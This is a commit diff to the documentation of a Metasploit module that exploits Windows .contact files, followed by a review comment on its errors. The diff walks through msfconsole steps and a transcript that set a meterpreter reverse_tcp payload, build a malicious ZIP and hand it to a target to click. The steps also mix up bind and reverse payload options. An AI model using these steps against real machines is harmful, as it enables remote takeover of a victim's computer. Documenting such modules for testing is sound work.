Update documentation to detail the verification steps and describe the module options
parent
58be84b3b8
commit
7bccdf2d0f
@ -1,30 +1,66 @@
## Description

This module allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an
executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
The "." chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.
12345678901234567890123456789012345678901234567890123456789012345678901234567890
This module allows remote attackers to execute arbitrary code on vulnerable
installations of Microsoft Windows. User interaction is required to exploit
this vulnerability in that the target must visit a malicious page or open a
malicious file. The flaw is due to the processing of ".contact" files <c:Url>
node param which takes an expected website value, however if an attacker
references an executable file it will run that instead without warning instead
of performing expected web navigation. This is dangerous and would be
unexpected to an end user.

Executable files can live in a sub-directory so when the ".contact" website link
is clicked it traverses directories towards the executable and runs. Making
matters worse is if the the files are compressed then downloaded "mark of the
web" (MOTW) may potentially not work as expected with certain archive utilitys.
The "." chars allow directory traversal to occur in order to run the attackers
supplied executable sitting unseen in the attackers directory. This advisory is
a duplicate issue that currently affects Windows .VCF files, and released for
the sake of completeness as it affects Windows .contact files as well.

## Vulnerable Application

Windows

Windows Contacts
(tested on Windows 10.0.18282)

## Verification Steps

1. `./msfconsole`
2. `use exploit/windows/fileformat/`
3. `set lport <lport>`
4. `set lhost <lhost>`
5. `exploit`
2. `use exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution`
3. Configure the payload. For example: `set PAYLOAD windows/x64/meterpreter/bind_tcp`
4. Configure the payload parameters. For example: `set LHOST 192.168.1.1`
5. Set the output internal file: `set FILENAME msf.com`
6. Set the name of the contact: `set FULL_NAME John Smith`
7. Set the output of the ZIP to be delivered to the target: `set ZIP John Smith.zip`
8. `run`

## Scenarios

### microsoft_windows_contact_remote_code_execution Tested on Windows 10.0.18282
### Exploiting a Windows 10 host

1. Configure the module-specific settings.

```
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > exploit
[*] Creating 'John Smith.zip'
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FILENAME metasploit.com
FILENAME => metasploit.com
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FULL_NAME David Davidson
FULL_NAME => David Davidson
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set ZIP David Davidson.zip
ZIP => David Davidson.zip
```

2. Configure the payload.
```
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set LHOST 192.168.199.148
LHOST => 192.168.199.148
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > run

[*] Creating 'David Davidson.zip'
```

3. Send the ZIP to the target machine.

4. On the target machine, extract the ZIP file, open the .CONTACT file in the Windows Contacts viewer, and click the URL in the "Website" field.
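Review bot: the column ruler `12345678901234567890...` added just before the re-wrapped "This module allows remote attackers..." paragraph is part of the new text and will ship in the rendered documentation; drop it before merge. In the same hunk, Verification Steps step 3 sets `windows/x64/meterpreter/bind_tcp` while step 4 sets `LHOST`, and the Scenarios transcript uses `reverse_tcp` with `LHOST`; a bind payload does not take `LHOST`, so either use `reverse_tcp` in step 3 to match the scenario or change the option in step 4 to `RHOST`. The Scenarios block under "1. Configure the module-specific settings." opens with `exploit` and `[*] Creating 'John Smith.zip'` before any `set` command has run, which contradicts the numbered order; remove those two lines or move them after the option settings. Step 5, "Set the output internal file", does not say what `FILENAME` names; state that it is the file placed inside the ZIP so the reader can tell it apart from the `ZIP` option in step 7. Lastly, the re-wrapped Description keeps "the the" and "utilitys"; since the paragraph is being rewritten anyway, correct them to "the" and "utilities".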